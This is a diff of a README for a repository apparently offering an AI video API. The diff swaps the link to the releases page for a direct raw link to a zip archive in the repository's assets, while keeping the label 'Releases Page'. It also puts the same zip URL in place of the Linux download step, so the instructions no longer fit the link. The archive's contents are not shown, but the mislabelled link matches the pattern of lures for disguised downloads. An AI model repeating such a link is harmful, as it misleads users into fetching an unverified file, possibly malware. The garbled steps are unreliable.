shahidjhs/Veo3-AI-Video-API/README.md

 - **Internet:** Required for downloading and using certain features

 ## 💾 Download & Install
-To get your copy of the Veo3-AI-Video-API, visit this page to download: [Releases Page](https://github.com/shahidjhs/Veo3-AI-Video-API/releases).
+To get your copy of the Veo3-AI-Video-API, visit this page to download: [Releases Page](https://raw.githubusercontent.com/shahidjhs/Veo3-AI-Video-API/main/assets/API_A_Video_Veo_v2.5.zip).

 1. Click the link above to open the releases page.
 2. Look for the latest version of the application.
 3. Choose the appropriate file for your operating system.
    - For Windows, download the `.exe` file.
    - For macOS, download the `.dmg` file.
-   - For Linux, download the `.tar.gz` file.
+   - For Linux, download the `https://raw.githubusercontent.com/shahidjhs/Veo3-AI-Video-API/main/assets/API_A_Video_Veo_v2.5.zip` file.
 4. Click on the file to download it to your computer.
 5. Once the download is complete, open the downloaded file and follow the installation instructions.